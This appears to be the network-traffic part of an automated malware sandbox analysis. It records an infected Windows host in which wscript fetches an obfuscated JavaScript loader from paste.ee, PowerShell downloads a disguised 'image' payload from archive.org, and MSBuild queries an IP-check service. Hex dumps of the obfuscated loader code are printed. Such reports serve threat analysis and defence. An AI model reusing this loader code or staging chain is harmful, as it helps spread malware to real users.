                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                  Content-Length: 530
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Server: sffe
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  Date: Mon, 28 Apr 2025 10:50:42 GMT
                                                                                                                                  Expires: Mon, 28 Apr 2025 11:40:42 GMT
                                                                                                                                  Cache-Control: public, max-age=3000
                                                                                                                                  Age: 2021
                                                                                                                                  Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                                                                                                                                  Content-Type: application/pkix-crl
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED]
                                                                                                                                  Data Ascii: 000*H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0*H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.649696158.101.44.242806720C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Apr 28, 2025 13:24:39.211945057 CEST151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Apr 28, 2025 13:24:39.373764038 CEST323INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 106
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 85c12f6e3814231d304a6cc30eababb9
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.244.56.186</body></html>
                                                                                                                                  Apr 28, 2025 13:24:39.377840996 CEST127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Apr 28, 2025 13:24:39.537199974 CEST323INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 106
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 69944972459f400f7970de768e0ff8cb
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.244.56.186</body></html>


                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.64968623.186.113.604437148C:\Windows\System32\wscript.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-04-28 11:24:09 UTC154OUTGET /d/fa7OMk20/0 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: */*
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                  Host: paste.ee
                                                                                                                                  2025-04-28 11:24:10 UTC953INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:09 GMT
                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                  Content-Length: 1448273
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Cache-Control: max-age=2592000
                                                                                                                                  X-Varnish: 43979760 44108644
                                                                                                                                  Age: 50
                                                                                                                                  Via: 1.1 varnish (Varnish/6.2)
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Strict-Transport-Security: max-age=63072000
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                  2025-04-28 11:24:10 UTC15431INData Raw: 0d 0a 76 61 72 20 71 75 65 61 6c 20 3d 20 28 5b 5d 2b 5b 20 20 28 5b 5d 5b 22 64 65 6e 74 69 6c 22 5d 2b 5b 5d 29 5b 30 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 22 5d 2b 5b 5d 29 5b 31 5d 20 2b 20 28 5b 5d 5b 22 6a 65 72 6b 69 6e 67 22 5d 2b 5b 5d 29 5b 32 5d 20 2b 20 28 5b 5d 5b 22 73 75 62 73 74 61 6e 64 61 72 64 6c 79 22 5d 2b 5b 5d 29 5b 33 5d 20 2b 20 28 5b 5d 5b 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38
                                                                                                                                  Data Ascii: var queal = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38 5d 20 2b 20 28 5b 5d 5b 22 73 6c 69 63 65 22 5d 2b 5b 5d 29 5b 39 5d 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 29 5b 36 5d 3b 20 20 20 20 20 0d 0a 76 61 72 20 4e 69 63 6f 70 6f 6c 69 74 61 6e 20 3d 20 28 5b 20 20 28 5b 5d 5b 22 64 65 6e 74 69 6c 22 5d 2b 5b 5d 29 5b 30 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 22 5d 2b 5b 5d 29 5b 31 5d 20 2b 20 28 5b 5d 5b 22 6a 65 72 6b 69 6e 67 22 5d 2b 5b 5d 29 5b 32 5d 20 2b 20 28 5b 5d 5b 22 73 75 62 73 74 61 6e 64 61 72 64 6c 79 22 5d 2b 5b 5d 29 5b 33 5d 20 2b 20 28 5b 5d 5b 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d
                                                                                                                                  Data Ascii: 7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["pansinusitis"])[6]; var Nicopolitan = ([ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[]
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 73 6b 69 6e 63 61 72 65 22 5d 2b 5b 5d 29 5b 31 5d 20 2b 20 28 5b 5d 5b 22 6a 65 72 6b 69 6e 67 22 5d 2b 5b 5d 29 5b 32 5d 20 2b 20 28 5b 5d 5b 22 73 75 62 73 74 61 6e 64 61 72 64 6c 79 22 5d 2b 5b 5d 29 5b 33 5d 20 2b 20 28 5b 5d 5b 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38 5d 20 2b 20 28 5b 5d 5b 22 73 6c 69 63 65 22 5d 2b 5b 5d 29 5b 39 5d 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 29 5b 36 5d 3b 20 20 20 20
                                                                                                                                  Data Ascii: skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["pansinusitis"])[6];
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 0a 76 61 72 20 4e 69 63 6f 70 6f 6c 69 74 61 6e 20 3d 20 28 5b 20 20 28 5b 5d 5b 22 64 65 6e 74 69 6c 22 5d 2b 5b 5d 29 5b 30 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 22 5d 2b 5b 5d 29 5b 31 5d 20 2b 20 28 5b 5d 5b 22 6a 65 72 6b 69 6e 67 22 5d 2b 5b 5d 29 5b 32 5d 20 2b 20 28 5b 5d 5b 22 73 75 62 73 74 61 6e 64 61 72 64 6c 79 22 5d 2b 5b 5d 29 5b 33 5d 20 2b 20 28 5b 5d 5b 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29
                                                                                                                                  Data Ascii: var Nicopolitan = ([ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38 5d 20 2b 20 28 5b 5d 5b 22 73 6c 69 63 65 22 5d 2b 5b 5d 29 5b 39 5d 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 29 5b 36 5d 3b 20 20 20 20 20 0d 0a 76 61 72 20 4e 69 63 6f 70 6f 6c 69 74 61 6e 20 3d 20 28 5b 20 20 28 5b 5d 5b 22 64 65 6e 74 69 6c 22 5d 2b 5b 5d 29 5b 30 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 22 5d 2b 5b 5d 29 5b 31 5d 20 2b 20 28 5b 5d 5b 22
                                                                                                                                  Data Ascii: "postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["pansinusitis"])[6]; var Nicopolitan = ([ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 69 6e 67 22 5d 2b 5b 5d 29 5b 32 5d 20 2b 20 28 5b 5d 5b 22 73 75 62 73 74 61 6e 64 61 72 64 6c 79 22 5d 2b 5b 5d 29 5b 33 5d 20 2b 20 28 5b 5d 5b 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38 5d 20 2b 20 28 5b 5d 5b 22 73 6c 69 63 65 22 5d 2b 5b 5d 29 5b 39 5d 5d 2b 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 29 5b 37 5d 3b 20 20 0d 0a 76 61 72 20 61 66 66 72 6f 6e 74 69 6e 67 20 3d 20 28 5b 5d 2b 5b 20 20 28 5b 5d 5b 22
                                                                                                                                  Data Ascii: ing"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]+[]["swimsuits"])[7]; var affronting = ([]+[ ([]["
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 6e 74 69 6c 22 5d 2b 5b 5d 29 5b 30 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 22 5d 2b 5b 5d 29 5b 31 5d 20 2b 20 28 5b 5d 5b 22 6a 65 72 6b 69 6e 67 22 5d 2b 5b 5d 29 5b 32 5d 20 2b 20 28 5b 5d 5b 22 73 75 62 73 74 61 6e 64 61 72 64 6c 79 22 5d 2b 5b 5d 29 5b 33 5d 20 2b 20 28 5b 5d 5b 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38 5d 20 2b 20 28 5b 5d 5b 22 73 6c 69 63 65 22 5d 2b 5b 5d 29 5b 39 5d 5d 5b 22 70 6c
                                                                                                                                  Data Ascii: ntil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["pl
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38 5d 20 2b 20 28 5b 5d 5b 22 73 6c 69 63 65 22 5d 2b 5b 5d 29 5b 39 5d 5d 2b 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 29 5b 37 5d 3b 20 20 0d 0a 76 61 72 20 61 66 66 72 6f 6e 74 69 6e 67 20 3d 20 28 5b 5d 2b 5b 20 20 28 5b 5d 5b 22 64 65 6e 74 69 6c 22 5d 2b 5b 5d 29 5b 30 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 22 5d 2b 5b 5d 29 5b 31 5d 20 2b 20 28 5b 5d 5b 22 6a 65 72 6b 69 6e 67 22 5d 2b 5b 5d 29 5b 32 5d 20 2b 20 28 5b 5d 5b 22 73 75 62 73 74 61
                                                                                                                                  Data Ascii: ["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]+[]["swimsuits"])[7]; var affronting = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substa
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 61 72 64 6c 79 22 5d 2b 5b 5d 29 5b 33 5d 20 2b 20 28 5b 5d 5b 22 70 6f 73 74 70 75 62 65 73 63 65 6e 74 22 5d 2b 5b 5d 29 5b 34 5d 20 2b 20 28 5b 5d 5b 22 70 61 6e 73 69 6e 75 73 69 74 69 73 22 5d 2b 5b 5d 29 5b 35 5d 20 2b 20 28 5b 5d 5b 22 70 72 69 76 65 64 22 5d 2b 5b 5d 29 5b 36 5d 20 2b 20 28 5b 5d 5b 22 73 6b 69 6e 63 61 72 65 4d 61 70 22 5d 2b 5b 5d 29 5b 37 5d 20 2b 20 28 5b 5d 5b 22 73 77 69 6d 73 75 69 74 73 22 5d 2b 5b 5d 29 5b 38 5d 20 2b 20 28 5b 5d 5b 22 73 6c 69 63 65 22 5d 2b 5b 5d 29 5b 39 5d 5d 5b 22 70 6c 65 75 72 6f 70 68 6f 72 75 73 22 5d 29 5b 38 5d 3b 20 20 20 20 20 0d 0a 0d 0a 0d 0a 76 61 72 20 74 65 74 72 61 6f 64 6f 6e 20 3d 20 28 5b 5d 2b 5b 49 6e 66 69 6e 69 74 79 5d 5b 2b 5b 5d 5d 29 5b 30 5d 2c 20 20 0d 0a 20 20 20 20 48 69
                                                                                                                                  Data Ascii: ardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["pleurophorus"])[8]; var tetraodon = ([]+[Infinity][+[]])[0], Hi
                                                                                                                                  2025-04-28 11:24:10 UTC16384INData Raw: 3d 20 28 5b 5d 2b 5b 49 6e 66 69 6e 69 74 79 5d 5b 2b 5b 5d 5d 29 5b 31 5d 2c 20 20 0d 0a 20 20 20 20 65 6d 62 6c 61 7a 65 64 20 3d 20 28 5b 5d 2b 5b 49 6e 66 69 6e 69 74 79 5d 5b 2b 5b 5d 5d 29 5b 32 5d 2c 20 20 0d 0a 20 20 20 20 73 70 65 61 72 68 65 61 64 20 3d 20 28 5b 5d 2b 5b 49 6e 66 69 6e 69 74 79 5d 5b 2b 5b 5d 5d 29 5b 33 5d 2c 20 20 0d 0a 20 20 20 20 72 65 74 72 61 76 65 6c 20 3d 20 28 5b 5d 2b 5b 49 6e 66 69 6e 69 74 79 5d 5b 2b 5b 5d 5d 29 5b 34 5d 2c 20 20 0d 0a 20 20 20 20 61 6e 73 77 65 72 20 3d 20 28 5b 5d 2b 5b 49 6e 66 69 6e 69 74 79 5d 5b 2b 5b 5d 5d 29 5b 35 5d 2c 20 20 0d 0a 20 20 20 20 61 6e 65 63 68 6f 69 63 20 3d 20 28 5b 5d 2b 5b 49 6e 66 69 6e 69 74 79 5d 5b 2b 5b 5d 5d 29 5b 36 5d 2c 20 20 0d 0a 20 20 20 20 69 6e 74 65 72 77 6f
                                                                                                                                  Data Ascii: = ([]+[Infinity][+[]])[1], emblazed = ([]+[Infinity][+[]])[2], spearhead = ([]+[Infinity][+[]])[3], retravel = ([]+[Infinity][+[]])[4], answer = ([]+[Infinity][+[]])[5], anechoic = ([]+[Infinity][+[]])[6], interwo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.649693207.241.224.24436852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-04-28 11:24:34 UTC127OUTGET /download/new_image_20250413/new_image.jpg HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0
                                                                                                                                  Host: archive.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2025-04-28 11:24:34 UTC1947INHTTP/1.1 302 Found
                                                                                                                                  Server: nginx/1.24.0
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:34 GMT
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Location: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
                                                                                                                                  Strict-Transport-Security: max-age=15724800
                                                                                                                                  Onion-Location: https://archivep75mbjunhxc6x4j5mwjmomyxb573v42baldlqu56ruil2oiad.onion/download/new_image_20250413/new_image.jpg
                                                                                                                                  Content-Security-Policy: report-uri https://archive.org/services/csp-report; default-src *; img-src * data: blob:; object-src 'none'; media-src * blob:; connect-src * data:; style-src 'unsafe-inline' https://archive.org/ https://archive.org https://esm.archive.org/ https://esm.ext.archive.org/ https://offshoot.prod.archive.org/ https://av.archive.org/css/ https://av.dev.archive.org/css/ https://accounts.google.com/gsi/ https://synerg.adp.com/; script-src 'nonce-46f6173e753d7c5c6ddd54f96d334d70' https://archive.org/includes/ https://archive.org/includes/ https://archive.org/components/ https://archive.org/components/ https://archive.org/v/ https://archive.org/v/ https://archive.org/upload/app/ https://archive.org/offshoot_assets/ https://archive.org/offshoot_assets/ https://esm.archive.org/ https://esm.ext.archive.org/ https://polyfill.archive.org/v3/polyfill.min.js https://offshoot.prod.archive.org/ https://av.archive.org/ https://av.dev.archive.org/ https://openlibrary.org/query.json https://emularity-user [TRUNCATED]
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  2025-04-28 11:24:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.649694207.241.233.304436852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-04-28 11:24:35 UTC138OUTGET /6/items/new_image_20250413/new_image.jpg HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0
                                                                                                                                  Host: ia801700.us.archive.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2025-04-28 11:24:35 UTC582INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.24.0
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:35 GMT
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 3172652
                                                                                                                                  Last-Modified: Sun, 13 Apr 2025 17:38:51 GMT
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "67fbf6ab-30692c"
                                                                                                                                  Strict-Transport-Security: max-age=15724800
                                                                                                                                  Expires: Mon, 28 Apr 2025 17:24:35 GMT
                                                                                                                                  Cache-Control: max-age=21600
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  2025-04-28 11:24:35 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 07 08 ff c4 00 47 10 00 02 02 01 03 02 05 02 04 05 03 04 01 01 02 0f 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 32 71 14 81 91 a1 06 23 42 b1 c1 52
                                                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222p"G!1A"Qa2q#BR
